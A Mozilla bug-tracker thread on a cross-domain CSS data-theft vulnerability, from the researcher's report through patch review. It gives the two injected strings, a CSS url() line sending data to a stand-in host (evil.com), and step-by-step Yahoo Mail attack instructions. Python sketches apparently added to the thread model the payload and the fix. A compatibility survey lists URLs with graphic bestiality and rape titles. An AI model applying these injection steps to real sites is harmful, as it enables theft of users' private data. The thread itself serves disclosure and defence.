Closed Bug 524223 (CVE-2010-0654) Opened 15 years ago Closed 15 years ago

Cross-domain data theft using CSS

Categories

(Core :: CSS Parsing and Computation, defect, P1)

defect

Tracking

RESOLVED FIXED
Tracking Status
blocking2.0 --- alpha1+
blocking1.9.2 --- needed
status1.9.2 --- .5-fixed
blocking1.9.1 --- needed
status1.9.1 --- .11-fixed

People

(Reporter: ladamski, Assigned: zwol)

References

Details

(4 keywords, Whiteboard: [sg:moderate])

Attachments

(5 files, 10 obsolete files)

21.64 KB, patch
Details | Diff | Splinter Review
30.79 KB, patch
Details | Diff | Splinter Review
63.23 KB, patch
Details | Diff | Splinter Review
64.42 KB, patch
dbaron
: review+
Details | Diff | Splinter Review
55.02 KB, patch
Details | Diff | Splinter Review
From Chris Evans:

The attack involves cross-domain CSS stylesheet loading. Because the CSS
parser is very lax, it will skip over any amount of preceding and following
junk, in its quest to find a valid selector. Here is an example of a valid
selector:

body { background-image: url('http://www.evil.com/blah'); }

If a construct like this can be forced to appear anywhere in a cross-domain
document, then cross-domain theft may be possible. The attacker can introduce
this construct into a page by injecting two strings:

1) {}body{background-image:url('http://google.com/
(Note that the seemingly redundant {} is to resync
the CSS parser to make sure the evil descriptor parses properly. Further note
that having the url start like a valid url is required to steal the text in
some browsers).

2) ');}

And anything between those two strings will then be cross-domain stealable! The
data is stolen cross domain with e.g.
window.getComputedStyle(body_element,
null).getPropertyValue('background-image');
(This works in most browsers; for IE, you use ele.currentStyle.backgroundImage)
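The mechanics above can be sketched outside the browser. Below is a hypothetical Python illustration (the helper name and the sample "secret" are invented for this sketch) of how the two injected strings bracket victim content into a single valid rule that standard CSS error recovery will accept:

```python
# Hypothetical illustration only; INJECTION_START/INJECTION_END mirror the
# two attacker-injected strings described above.
INJECTION_START = "{}body{background-image:url('http://google.com/"
INJECTION_END = "');}"

def assemble_victim_page(secret: str) -> str:
    """Simulate a victim page that reflects two attacker strings with
    sensitive content between them (e.g. two e-mail subjects)."""
    return ("<html><body>markup the lax CSS parser skips over "
            + INJECTION_START + secret + INJECTION_END
            + " more markup</body></html>")

page = assemble_victim_page("Secret: reset token 12345")
# The secret now sits inside the url(...) of one syntactically valid
# rule, so CSS error recovery keeps it -- provided the secret contains
# no newline or unescaped quote (the constraints noted below).
assert "url('http://google.com/Secret: reset token 12345')" in page
```

A lax parser loading this whole document as a stylesheet skips the surrounding markup as junk and recovers exactly one well-formed rule, with the secret embedded in its url() value.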

There are a surprising number of places in internet sites where an attacker
can do this. It can apply to HTML, XML, JSON, XHTML, etc.

At this point, an example is probably useful. To set up for this example, you
need:
a) Get a Yahoo! Mail account.
b) Make sure you are logged into it.
c) E-mail the target victim Yahoo! account with the subject
');}
d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate
one).
e) E-mail the target victim Yahoo! account with the subject
{}body{background-image:url('http://google.com/
f) Send victim to theft page
https://cevans-app.appspot.com/static/yahoocss.html
g) The stolen text shown is achieved via cross-domain CSS theft.

Other good examples I've had success with are social networking sites, where
the attacker gets to leave arbitrary-text comments which are rendered on the
victim's trusted page.

The main common construct that prevents exploitation is newlines.
Obviously, newlines cannot be considered a defense! Escaping or encoding of
quote characters can also interfere with exploitation. One useful trick: if '
is escaped, use " to enclose the CSS string.

Part 2 (on possible solutions) to follow.


Possible solutions.

First, there are some solutions it is easy to reject:

1) Restrict read of CSS text if it came from a different domain.
This is a useful defense that I filed a while ago in a different bug. But it
will not help in this case. The attacker can simply use
http://www.attacker.com/ as a prefix for the background-image value, and wait
for the HTTP GET to arrive which includes the stolen text in the payload.

2) Do not send cookies for cross-domain CSS loads.
This probably breaks a load of sites? It is certainly a riskier approach. I
have not dared try it!


The solution that I'm playing with is as follows:

- Activate "strict MIME type required" in the event that the CSS was loaded
(via link tag or @import) as a cross-domain resource.

- Also, crash hard if a CSS load fails due to strict MIME type test failure.

I've been running my build locally with these changes for a few days and there
seems to be some merit in this approach, i.e. my browser hasn't crashed apart
from when I hit my attack URLs.

I see that WebKit has a history of defaulting to "strict MIME type required"
for _all_ CSS loads, and that historically broke some sites like dell.com and
was reverted.
Perhaps the web at large now has its MIME types in order well enough to at
least enforce strict for cross-domain CSS loads? If too much breaks, we have
the additional level we can introduce of trying to parse the cross-domain CSS
but bailing on first syntax error. I'd like to avoid a test that is going that
deep into nuance, however.
Marking sg:moderate as it could lead to theft of confidential information, but is mitigated by the need to inject attacker-controlled content into the page being viewed on the victim site.
Whiteboard: [sg:moderate]
(In reply to comment #0)
> Perhaps the web at large now has its MIME types in order well enough to at
> least enforce strict for cross-domain CSS loads?

This seems like something that we could try.  Probably we'd
want to use the eTLD service, but we could avoid doing that until
we've already found that we loaded a stylesheet and it's not
text/css .

I suspect the big question would be whether sites like akamai send
the correct MIME type reliably.

The other question is whether we'd have a problem with the things
that we now accept in standards mode: empty content-type and
UNKNOWN_CONTENT_TYPE, and whether we'd need to change our handling
of those in order to prevent this attack.  (Probably not in most
cases, but there could be some; then again, one could easily argue
it's a bug in the site if it's putting content it wants interpreted
in a specific way in a response with no Content-Type specified.)


The relevant code is in SheetLoadData::OnStreamComplete in
nsCSSLoader.cpp, though we probably also have to worry about the
hint type set in CSSLoaderImpl::LoadSheet.  Boris might know more.
Component: Security → Style System (CSS)
QA Contact: toolkit → style-system
OS: Mac OS X → All
Hardware: x86 → All
An update. I've crunched some data on 500,000 URLs and will have a recommendation on how to close the hole without breaking compatibility shortly :)

Regarding comment #2 - I'd see it as a bug in a site if it had a missing content-type, or a poorly specified content type.
I fixed this properly in WebKit (pending review).

I mined 500,000 URLs to see what sort of cross-domain CSS load + MIME braindamage exists. There's a little bit, e.g. configure.dell.com loading text/plain CSS. A bunch of sites do this. A bunch of other sites load application/octet-stream CSS and even a fair bit of text/html CSS.

Therefore, the solution devised was:
- Reject a CSS load if all of these are met:
a) It is a cross-domain load (making sure a redirect does not confuse the domain check).
b) The MIME type is not one of the accepted ones (text/css, application/x-unknown-content-type, or empty).
c) The alleged CSS does not start with a syntactically valid CSS construct.

The above rules will block the attack because an HTML, XML etc. header will always cause a broken first CSS descriptor.

And the above rules are compatible. Out of the 500,000 URLs, just one very broken site has its look changed a little by this change: http://practiceexam.keys2drive.ca/quiz.php which does cross-domain CSS load for a text/html resource which has a CSS resource after a <style> tag. That is highly broken.
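As a rough sketch, the three-condition rule could be expressed as the following Python (the function names and the "valid first construct" regex are simplified stand-ins invented for illustration, not the actual WebKit or Gecko code):

```python
# Hedged sketch of the rejection rule described above; the "starts with a
# syntactically valid CSS construct" check is a crude approximation.
import re

ACCEPTED_MIME = {"text/css", "application/x-unknown-content-type", ""}

# Very rough stand-in for "begins with a valid CSS construct": an @-rule,
# or a selector followed by an opening brace.
_VALID_HEADER = re.compile(r"^\s*(@[\w-]+[^;{]*[;{]|[^{}<>]+\{)")

def should_reject(cross_domain: bool, mime_type: str, body: str) -> bool:
    """Reject only if ALL three conditions listed above hold."""
    if not cross_domain:
        return False
    if mime_type.lower() in ACCEPTED_MIME:
        return False
    return _VALID_HEADER.match(body) is None

# An HTML document served cross-domain as a stylesheet has a broken
# "header" and is rejected:
assert should_reject(True, "text/html", "<!DOCTYPE html><html>...")
# Real CSS mislabeled as text/plain (the configure.dell.com case) loads:
assert not should_reject(True, "text/plain", "body { color: red }")
```

On this model, an HTML or XML response loaded cross-domain as a sheet is always rejected because its first bytes never form a valid CSS construct, while mislabeled-but-real CSS keeps working, which is what makes the rule compatible with the surveyed sites.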

Regarding disclosure, there is no particular co-ordination. Fix and disclose when you are ready. Please credit "Chris Evans, Google Security Team".
This issue will be disclosed no later than 16th April 2009, and quite probably a lot sooner.
(In reply to comment #4)
> This issue will be disclosed no later than 16th April 2009, and quite probably
> a lot sooner.

16th April 2010, I hope you mean?
blocking1.9.1: --- → ?
status1.9.1: --- → ?
Flags: wanted1.9.0.x?
Flags: blocking1.9.2?
(In reply to comment #0)
> At this point, an example is probably useful. To set up for this example, you
> need:
> a) Get a Yahoo! Mail account.
> b) Make sure you are logged into it.
> c) E-mail the target victim Yahoo! account with the subject
> ');}
> d) Wait a bit, so that some sensitive e-mails fill the inbox. (Or just simulate
> one).
> e) E-mail the target victim Yahoo! account with the subject
> {}body{background-image:url('http://google.com/
> f) Send victim to theft page
> https://cevans-app.appspot.com/static/yahoocss.html
> g) The stolen text shown is achieved via cross-domain CSS theft.

I think, in a conformant CSS implementation, this will only work if there are no newlines or single quotes between the content from (e) and the content from (c), so the attack is rather constrained (though still, I think, worth fixing).
@5: Yes, 16th April 2010 as an upper bound. I wouldn't be surprised if WebKit-based browsers update sooner, though, since the WebKit patch should land tonight. I also worry that people monitor WebKit commits for additions to the LayoutTests/http/tests/security directory.

@6: Correct about newlines. Single quotes do not pose a problem for the attacker, as there is the option to enclose the CSS string within double quotes. A single quote within a double quote (and vice versa) is fine.
Also, I've found that "no newlines" is quite common in data access APIs that spit out authenticated data as JSON or XML.
blocking1.9.1: ? → needed
Flags: wanted1.9.0.x? → wanted1.9.0.x+
Whiteboard: [sg:moderate] → [sg:moderate] disclosure upper bound April 2010, but webkit fix checked in
Not blocking 1.9.2, but we should definitely come up with a fix ASAP and backport that fix to some 1.9.2 update.

The plan in comment #4 looks good to me.

Zack, can you take this?
Flags: blocking1.9.2? → blocking1.9.2-
Sure, I'm already messing with the CSSLoader; this shouldn't be too hard.  @cevans: would you be willing to let us have the tests you wrote for WebKit, & if so, could you attach them to this bug?
This is an incomplete patch.  It compiles, and it contains the code necessary to detect the conditions laid out in comment #4 and notify the parser, but I haven't actually made the parser do anything with this yet.  That's going to be rather longer and less interesting, alas.

I'm asking for review on this because I'm not sure I did the cross-domain check correctly nor in all the places where it needs to happen.

Tangentially, this patch (as with anything that touches nsICSSParser) is going to conflict with my changes in bug 523496.  I'd kinda like to land that first.
Assignee: nobody → zweinberg
Status: NEW → ASSIGNED
Attachment #411763 - Flags: review?(bzbarsky)
Comment on attachment 411763 [details] [diff] [review]
partial patch (CSSLoader changes only)

This doesn't actually work right, since you're doing the same-origin check before you start the load.  In particular, the attacker could link to his own server (same-origin for purposes of this check) and then issue an HTTP 3xx response to redirect to the server being attacked.  The code here wouldn't detect that.

A better way to handle this, probably, is to compare mLoaderPrincipal (which is the principal of the entity that started the load) to |principal| (which is the principal of the stylesheet, now that we've got its data and know exactly where that came from) in SheetLoadData::OnStreamComplete.  Presumably a Subsumes() check.  Note that mLoaderPrincipal may be null, in which case the load wasn't triggered on behalf of any web page and should be allowed.
Attachment #411763 - Flags: review?(bzbarsky) → review-
Oh, and if you want to land this on branches you need a version that doesn't go on top of bug 523496 anyway, right?
As requested, I'll upload the WebKit patch (including test) that is currently in-review.
An update on disclosure: since this is a tricky issue, there is guaranteed to be no disclosure prior to Dec 28th 2009.

If you want to fix this sooner than then -- please do, and push your fix out to users. Just refrain from mentioning this in the release notes or security notes. Non-prominent disclosure via source repository comments is fine.
Whiteboard: [sg:moderate] disclosure upper bound April 2010, but webkit fix checked in → [sg:moderate] embargoed until at least 2009-12-28, possibly as long as Apr-2010. webkit fix checked in
(In reply to comment #11)
> (From update of attachment 411763 [details] [diff] [review])
> This doesn't actually work right, since you're doing the same-origin check
> before you start the load.  In particular, the attacker could link to his own
> server (same-origin for purposes of this check) and then issue an HTTP 3xx
> response to redirect to the server being attacked.  The code here wouldn't
> detect that.

I was afraid there might be a problem like that.  Thanks.

> A better way to handle this, probably is to compare mLoaderPrincipal (which is
> the principal of the entity that started the load) to |principal| (which is the
> principal of the stylesheet, now that we've got its data and know exactly where
> that came from) in SheetLoadData::OnStreamComplete.  Presumably a Subsumes()
> check.  Note that mLoaderPrincipal may be null, in which case the load wasn't
> triggered on behalf of any web page and should be allowed.

Ok.  That should be less invasive, too, which is nice. 

I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but do I have to worry about null *principals* in here as well?

(In reply to comment #12)
> Oh, and if you want to land this on branches you need a version that doesn't go
> on top of bug 523496 anyway, right?

Bleah, good point.  I'll keep developing it in isolation then.
(In reply to comment #16)
> I see that in some circumstances mLoaderPrincipal may be a null *pointer*, but
> do I have to worry about null *principals* in here as well?

|principal| is guaranteed non-null here, provided the early-return branch that logs "couldn't get principal" was not taken.  I assume that's what you were asking about?

If you were asking about nsNullPrincipal, then you don't need to worry about it.  mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal and that's ok.  The security checks will do the right thing with that.
(In reply to comment #17)
> If you were asking about nsNullPrincipal, then you don't need to worry about
> it.  mLoaderPrincipal (and |principal|, for that matter) may be nsNullPrincipal
> and that's ok.  The security checks will do the right thing with that.

Yes, I was asking about nsNullPrincipal.  Thanks for clarifying.

My other big concern at this stage is here:

@@ CSSLoaderImpl::LoadSheet
-    rv = ParseSheet(converterStream, aLoadData, completed);
+    // XXX Can we ever have a cross-domain, improper-MIME, synchronous load?
+    rv = ParseSheet(converterStream, aLoadData, completed, PR_FALSE);

I'm not clear on how synchronous loads get triggered or what they're used for.  Other things in this function imply that they are only for UA sheets, so we don't have to worry about cross-domain, but I'm not sure.
(In reply to comment #18)
> I'm not clear on how synchronous loads get triggered or what they're used for. 

LoadSheetSync is a public nsICSSLoader API, so any C++ code that really wants to can use it...

Current consumers in mozilla-central (excluding tests) are:

* nsChromeRegistry: should only happen for chrome:// URIs
* nsHTMLEditor: should only happen for editor-provided URIs
* nsLayoutStyleSheetCache: scrollbars.css, forms.css, ua.css, quirk.css,
                           userContent.css, useChrome.css
* nsStyleSheetservice: extension-provided UA and user sheets
* nsDocumentViewer: usechromesheets attribute on chrome <xul:browser/iframe>
* nsXBLPrototypeResources: chrome:// URIs only.
* nsXBLResourceLoader: chrome:// URIs only.
* nsXMLContentSink: catalog sheets only (in practice, mathml.css)
* nsDocument: catalog sheets

If LoadSheetSync ever gets a URI under control of untrusted content that's a serious bug, fwiw.
Attached patch complete patch (obsolete) — Splinter Review
Here's a complete patch with the necessary parser changes and tests.  I'm not sure I implemented exactly the same parsing semantics that cevans did for Webkit, but I doubt that the precise rules matter too much.  If anyone can suggest a way to avoid adding 48 tiny little files to layout/style/tests I am all ears.

A remaining concern: does the error cleanup logic in SheetComplete() ensure that Javascript never sees the aborted sheet, or do we need to undo actions in the parser as well?
Attachment #411763 - Attachment is obsolete: true
Attachment #412759 - Flags: superreview?(dbaron)
Attachment #412759 - Flags: review?(bzbarsky)
Comment on attachment 412759 [details] [diff] [review]
complete patch

I think I'd prefer s/raconian/raconianParsing/ throughout in variable and argument names.

>+++ b/layout/style/nsCSSParser.cpp
>+// Draconian error handling is a nonstandard mode used to close a
>+// data-theft loophole.  A quirks mode document can declare any Web
>+// resource to be its style sheet; regardless of that resource's MIME
>+// type, we'll try to parse it as CSS.  The normal CSS error recovery
>+// rules give the attacker a fairly decent chance of finding a valid
>+// style rule or two in there

Not sure how much of that comment we should leave in when we land if we're trying to not disclose this bug... I guess there's nothing there that describes the actual technique used here, but still please double-check with Chris?

> and the text of that rule then becomes
>+// accessible to the attacking document via the CSSOM.

As a matter of fact, no it does not.  We enforce same-origin checks on CSSOM access.  What the attack here does is to get parts of the data in the attacked document into a url() production, at which point the browser sends it to a server of the attacking document's choice as part of a GET.

>+  // XXX If draconian error handling triggered, should we undo all changes
>+  // to the style sheet?  nsI[CSS]StyleSheet doesn't have methods for that...

We probably need to do that, yes.  Add a method?  It can throw if the sheet is complete, to make sure no one but us uses it.

As far as that goes, we might kick off @import loads before we hit a parse error.  Do we want to abort them?  They could in theory be communicating information to the server...  But again, check with Chris?  It sounds like his patch only aborts if the first rule it tries to parse doesn't parse; once it's parsed a rule it just follows normal CSS error-recovery.  That would seem to be sufficient to me.

I didn't look at the tests very carefully.

> does the error cleanup logic in SheetComplete() ensure that Javascript never
> sees the aborted sheet

It does not, however in the cross-domain case JS can't access the sheet's rules directly anyway, per above.
(In reply to comment #21)
> (From update of attachment 412759 [details] [diff] [review])
> I think I'd prefer s/raconian/raconianParsing/ throughout in variable and
> argument names.

Ok.

> >+++ b/layout/style/nsCSSParser.cpp
> >+// Draconian error handling is a nonstandard mode [...]
> 
> Not sure how much of that comment we should leave in when we land if we're
> trying to not disclose this bug... I guess there's nothing there that
> describes the actual technique used here, but still please double-check
> with Chris?

Well, he's reading the bug... Chris?

 
> > and the text of that rule then becomes
> >+// accessible to the attacking document via the CSSOM.
> 
> As a matter of fact, no it does not.  We enforce same-origin checks on CSSOM
> access.

Huh, Chris said in the original description that it's a JS-based attack:

# The data is stolen cross domain with e.g.
# window.getComputedStyle(body_element, null)
#  .getPropertyValue('background-image');
# (This works in most browsers; for IE, you use
#  ele.currentStyle.backgroundImage)

Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

> What the attack here does is to get parts of the data in the attacked
> document into a url() production, at which point the browser sends it to a
> server of the attacking document's choice as part of a GET.

The existing patch may not protect against that scenario, depending on when the GET fires.  I *think* it never happens during parse, except maybe for @font-face, but I'm not sure that's a safe "except".

> >+  // XXX If draconian error handling triggered, should we undo all changes
> >+  // to the style sheet?  nsI[CSS]StyleSheet doesn't have methods for that...
> 
> We probably need to do that, yes.  Add a method?  It can throw if the sheet is
> complete, to make sure no one but us uses it.

It occurs to me that the only things that will get into the style sheet are from syntactically valid constructs preceding the first syntax error.  It kinda sounded like Chris's proposal was for a weaker rule than the one I implemented: if the *first* construct in the document is ill-formed, bail out, otherwise do normal CSS error recovery.  I could change it to be like that, and then we wouldn't need this additional sheet-rollback handling.  But I'm not sure it's enough protection.  Chris, what exactly did you make Webkit do?  I'm not familiar enough with Webkit's CSS parser to tell from the patch.
> Maybe getComputedStyle is not a "CSSOM" access in the strict sense...?

Ah, yeah.  That's true.  You can't access the rules directly, but you can observe their effect on the computed style...

> I *think* it never happens during parse

@import gets happen during parse.  Or at least the channel's asyncOpen is called during parse.  @font-face is not.

> It occurs to me that the only things that will get into the style sheet are
> from syntactically valid constructs preceding the first syntax error.

Yes.

> It kinda sounded like Chris's proposal was for a weaker rule

That's the impression I got too.  Looking at the attached webkit patch, that seems to be exactly what's going on to me:

+    if (m_styleSheet && !m_hadSyntacticallyValidCSSRule)
+        m_styleSheet->setHasSyntacticallyValidCSSHeader(false);

(in "invalid block hit") and then:

+    if (crossOriginCSS && !validMIMEType && !m_sheet->hasSyntacticallyValidCSSHeader())
+        m_sheet = CSSStyleSheet::create(this, url, charset);

(which replaces m_sheet with a blank sheet).  I'm not sure what sets m_hadSyntacticallyValidCSSRule; that part seems to be autogenerated lexer code.
@Zack, #22: feel free to commit whatever comments you want. If news breaks out, then so be it. Co-ordinating something like this across a million browser vendors (some of whom move at glacial speeds) is just too complicated.

@Boris, Zack #22 & #23: it's not necessarily a JS-based attack. My demo is JS-based because that is the easiest demo. However, imagine if getComputedStyle() did not exist. The attacker can still steal the same data because the background-image URL fetch will send the data in the GET request to evil.com.
On Mon, Nov 23, 2009 at 10:55 AM, Zack Weinberg <zweinberg@mozilla.com> wrote:
> I'm still a little confused about one nuance of the CSS cross-site data
> theft mitigation you proposed in Mozilla bug 524223.  Suppose that we
> load a cross-domain URI as a style sheet, it has the wrong MIME type,
> the *first* complete construct in the file is a valid CSS rule but
> there's a syntax error after that point.  Should we still disregard the
> whole sheet?  Or should we revert to regular CSS error handling if the
> first complete construct is well-formed?

The latter. The check is, in concept, a "header" check.

Also, we distinguish a syntax error from a semantic error (such as an
unknown property). The latter should not be considered an error.
Comment on attachment 412759 [details] [diff] [review]
complete patch

I've thought about this for a bit, and I've decided that I don't like the idea of having different behavior based on whether the first rule (or entirety) of a style sheet parses correctly.

The first reason that I think this is bad is that I think, in general, heuristics are bad for the platform.  By heuristics, I mean complex mechanisms intended to divine intent out of existing content on the Web (such as what Opera does with media="handheld", or this).  While they're fine at handling existing content (and that's what they're designed for), I think they're bad for two reasons:  (1) they provide a bizarre API for future authors, who become unable to build a mental model of how the Web as a platform behaves, and (2) it makes it more complex for new entrants in the Web browser market, since they have to reverse-engineer these heuristics for compatibility with existing content.

Second, I don't like the implications of such a change for CSS error handling rules.  CSS depends for future extensibility on the idea that new constructs added to the language will be skipped in well-defined ways.  Taking this approach would break this and make Web authors much more hesitant to use future CSS language constructs as they are added, for fear of causing entire stylesheets to be ignored in older browsers that don't support those constructs.

So, on that basis, I'm denying superreview.


Instead, I think that we should take a slightly bigger short-term risk (for longer-term gain) and stop processing all cross-domain stylesheet loads with mismatched MIME types.
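A minimal sketch of that stricter rule, assuming the semantics are simply "cross-origin sheets must be served as text/css" (the function name is invented for illustration; real Gecko code would do this check on principals and channels, not booleans and strings):

```python
# Hypothetical sketch of the stricter rule: the sheet's contents are never
# inspected; only the origin relationship and the Content-Type matter.
def accept_sheet(same_origin: bool, mime_type: str) -> bool:
    if same_origin:
        return True  # same-origin loads keep the existing lax behavior
    # Cross-origin: require text/css, ignoring any charset parameter.
    return mime_type.split(";")[0].strip().lower() == "text/css"

assert accept_sheet(False, "text/css; charset=utf-8")
assert not accept_sheet(False, "text/plain")
assert accept_sheet(True, "text/html")  # same-origin: still allowed
```

Because the content is never parsed before the decision, there is no heuristic for authors or other vendors to reverse-engineer; the cost is breaking sites that serve real CSS cross-domain with a wrong MIME type (such as configure.dell.com).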
Attachment #412759 - Flags: superreview?(dbaron) → superreview-
(In reply to comment #26)
> Instead, I think that we should take a slightly bigger short-term risk (for
> longer-term gain) and stop processing all cross-domain stylesheet loads with
> mismatched MIME types.

I'm happy with this, and will add that I was not enthusiastic about being able to get the parser changes required for cevans' proposed rule into 3.6.x.  Your somewhat more strict rule, on the other hand, is much easier to implement with the parser we've got (indeed, it requires no changes to nsCSSParser at all).

cevans: from that data set you crunched, how many sites were doing MIME-mislabeled, cross-domain loads of *syntactically valid* CSS?
I'll paste in the list of URLs. This list is for URLs I found that do cross-domain CSS loads with invalid MIME type. It's 83 URLs out of about 500,000. In the majority of cases, the CSS is syntactically valid. I think about 3 of those 83 returned syntactically _in_valid CSS in the form of CSS surrounded by <style> and a text/html MIME type.

Note that breaking all of these URLs would have consequences. For example, configure.dell.com is regrettably broken and uses the text/plain MIME type for cross-domain CSS in its "configure your PC" pages. That would be a significant breakage. Although presumably dell.com would fix it pretty damn pronto if their broken-yet-money-making site started failing to render in a browser as popular as Firefox.

Also beware that some of these URLs are porn URLs with pretty rough content. Well, I think that's clear from the text in the URLs themselves :-)

http://ads.lfstmedia.com/fbslot/slot328
http://apps.facebook.com/eltabaco/index.php
http://apps.facebook.com/yoursay/
http://configure.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/config.aspx
http://configure.la.dell.com/dellstore/poll.aspx
http://configure.us.dell.com/dellstore/DiscountDetails.aspx
http://configure.us.dell.com/dellstore/config.aspx
http://configure.us.dell.com/dellstore/print_summary_details_popup.aspx
http://date.bluesystem.ru/
http://date.bluesystem.ru/login.php
http://date.bluesystem.ru/members/
http://date.bluesystem.ru/members/who_viewed.php
http://date.bluesystem.ru/messages/
http://date.bluesystem.ru/messages/msgs.php
http://date.bluesystem.ru/photo/
http://date.bluesystem.ru/search.php
http://date.bluesystem.ru/view.php
http://date.bluesystem.ru/view_sex.php
http://forms.real.com/real/player/blackjack.html
http://forms.real.com/real/realone/realone.html
http://forum.derwesten.de/viewtopic.php
http://info.smmail.cn/jsp/service/LoginInterFace.jsp
http://jplanner.travelinenortheast.info/jpclient.exe
http://media.paran.com/entertainment/newslist.php
http://media.paran.com/entertainment/newsview.php
http://media.paran.com/sdiscuss/newshitlist.php
http://media.paran.com/sdiscuss/newsview2.php
http://media.paran.com/snews/newslist.php
http://media.paran.com/snews/newsview.php
http://month.gismeteo.ru/
http://month.gismeteo.ru/forecast.php
http://news.gismeteo.ru/news.n2
http://practiceexam.keys2drive.ca/quiz.php
http://search.chl.it/search.aspx
http://search.vampirefreaks.com/search_results.php
http://story.bluesystem.org/read.php
http://submit.123rf.com/submit/myuploaded.php
http://telefilmdb.blogspot.com/
http://www.aif.ru/
http://www.art.com/gallery/id--0/posters_p2.htm
http://www.baseball-reference.com/
http://www.baseball-reference.com/minors/player.cgi
http://www.baseball-reference.com/pl/player_search.cgi
http://www.edurang.net/uview/wrd/run/portal.show
http://www.fantatornei.com/calcio/fantalega/gestionelega.asp
http://www.google.es/ig/setp
http://www.homeportfolio.com/catalog/Listing.jhtml
http://www.pleshka.com/
http://www.smmail.cn/smmail/sy/index.html
http://www.tabelas.lancenet.com.br/Default.aspx
http://www.thongsdaily.com/
http://www.zootube365.com/
http://www.zootube365.com/animal-sex/1/
http://www.zootube365.com/animal-sex/horse-and-woman/1446/
http://www.zootube365.com/animal-sex/rochdale----does-her-pony/9740/
http://www.zootube365.com/animal-sex/woman-raped-by-pig-and-dog/2129/
http://www.zootube365.com/dog-sex/3/
http://www.zootube365.com/dog-sex/3/page/2/
http://www.zootube365.com/dog-sex/3/page/3/
http://www.zootube365.com/dog-sex/3/page/4/
http://www.zootube365.com/dog-sex/dog-cum00/11850/
http://www.zootube365.com/dog-sex/dog-****-woman-firsttime/293/
http://www.zootube365.com/dog-sex/stuck-on-the-knot/1827/
http://www.zootube365.com/forum.html
http://www.zootube365.com/horse-sex/2/
http://www.zootube365.com/horse-sex/2/page/2/
http://www.zootube365.com/horse-sex/horse-try-woman-1/202/
http://www.zootube365.com/horse-sex/horsegirlcum/11487/
http://www.zootube365.com/horse-sex/linda-and-pony/191/
http://www.zootube365.com/latest.html
http://www.zootube365.com/latest/page/12/
http://www.zootube365.com/latest/page/13/
http://www.zootube365.com/latest/page/2/
http://www.zootube365.com/latest/page/4/
http://www.zootube365.com/latest/page/6/
http://www.zootube365.com/latest/page/7/
http://www.zootube365.com/login.html
http://www.zootube365.com/payment_start.html
http://www.zootube365.com/register.html
http://www.zootube365.com/search.html
http://www.zootube365.com/top.html
http://zootube365.com/
What definition of "cross domain" was used for generating that list?  Were the relevant dell.com stylesheets hosted on another subdomain of dell.com, or elsewhere?
"cross domain" as in the classic same origin policy case. i.e. a.dell.com != b.dell.com

(As an aside, I find all areas where the web model gives subtle extra privs between shared subdomains to be distasteful. Examples include the ability to interfere via setting domain cookies, and the "third party cookie" concept).

In the case of the dell.com site breakage, it appears that configure.dell.com is loading CSS from configure-cdn.dell.com as text/plain.
I don't have a full breakdown, but some of the examples weren't a.blah.com vs. b.blah.com. I can't remember which ones, but some of the porn sites were loading CSS from a raw IP (?!) and I think it was application/octet-stream MIME type.

It is true that you likely could cover most (all?) of the cases with a combination of subdomain tricks plus maybe MIME type exemptions. You'd need to resample the above list. I don't have the data in the form "domain, CSS domain, MIME type" unfortunately.
Attachment #412759 - Flags: review?(bzbarsky)
This patch implements dbaron's more aggressive proposal of disallowing *any* cross-domain load with an improper MIME type.

It looks to me like the number of *sites* affected is quite small -- maybe only ten or so out of cevans' data set -- so that seems to me like we could reasonably punt to evangelism. How about we put this in 3.6.0 and see how loud the screaming is?

Note: I'm on vacation from Wednesday evening until the first week of January.
Attachment #412759 - Attachment is obsolete: true
Attachment #418733 - Flags: superreview?(dbaron)
Attachment #418733 - Flags: review?(bzbarsky)
FYI to reviewers: There is reindentation in the patch, the actual lines of code changed in nsCSSLoader are very few.  Also, I redid the test case to generate all the little CSS fragments we need out of an .sjs file rather than put them in CVS.  There's still an awful lot of repetition in the test case proper (ccd-{quirks,standards}.html) but there's not much we can do about that.
Here's a diff of nsCSSLoader.cpp ignoring the reindentation.  (This is the only file with code changes.)
Attachment #418737 - Attachment is patch: true
@Zack -- out of interest, what definition of "cross-domain" did you go with in the end (e.g. www.dell.com vs. configure.dell.com)?

I'd imagine people would be irritated if they couldn't customize Dell machine configurations any more.

On the other hand... congrats on FF3.5 becoming the single most popular browser out there! That's awesome, and gives leverage to request broken sites fix themselves. Doing the change more strictly is probably the right thing to do, and any e-commerce site is going to fix their broken MIME types pronto if it stops working well in FF.
(In reply to comment #34)
> @Zack -- out of interest, what definition of "cross-domain" did you go with in
> the end (e.g. www.dell.com vs. configure.dell.com)?

The strict one.  Or, more accurately, the default one, which happens to be strict.

> I'd imagine people would be irritated if they couldn't customize Dell machine
> configurations any more.

I was thinking that we should at least contact the sites on your list and give them a heads-up before the patch lands.  And this will need to be very clearly relnote-d.  Which maybe means we need to backport it to 3.5 and 3.0 to avoid the "black hat uses our relnotes as a cookbook" thing.
Comment on attachment 418733 [details] [diff] [review]
patch v2: quirks mode improper MIME type style loads must be same origin

r=bzbarsky, but as long as you're making the logging not suck how about:

 LOG_WARN(("  Ignoring sheet with improper MIME type %s", contentType.get()));

?
Attachment #418733 - Flags: review?(bzbarsky) → review+
I remember thinking I should do that, but then I forgot to actually do it.

Changed in my copy.
Comment on attachment 418733 [details] [diff] [review]
patch v2: quirks mode improper MIME type style loads must be same origin

Did you check that the test for bug 397427 still fails if you locally revert that bug's fix?  (And likewise for your own tests?)

sr=dbaron
Attachment #418733 - Flags: superreview?(dbaron) → superreview+
@Zack, #35: feel free to mention this in the release notes whenever 3.6 makes it out (and even if that happens before the 28th).
And, in particular, did you test that your test fails both for incorrect ignoring and for incorrect using of style sheets?
(In reply to comment #39)
> @Zack, #35: feel free to mention this in the release notes whenever 3.6 makes
> it out (and even if that happens before the 28th).

This is unlikely to make 3.6.
But we'll probably end up backporting this to some stable 3.6 release, *after* we've dealt with the site compatibility fallout.
(In reply to comment #38)
> (From update of attachment 418733 [details] [diff] [review])
> Did you check that the test for bug 397427 still fails if you locally revert
> that bug's fix?  (And likewise for your own tests?)

I did not.  Will try that first thing tomorrow.
I didn't revert the entire patch for bug 397427, but I did change both calls to SetURIs() in nsCSSLoader to not pass the specially-calculated "original URL".  This makes six of the 18 tests in test_bug397427.html fail:

failed | href should be null - got "http://localhost:8888/tests/layout/style/test/test_bug397427.html", expected null
failed | should be actual null - got "string", expected "object"
passed | Redirect 1 did not work
passed | Redirect 1 did not get right base URI
passed | Redirect 2 did not work
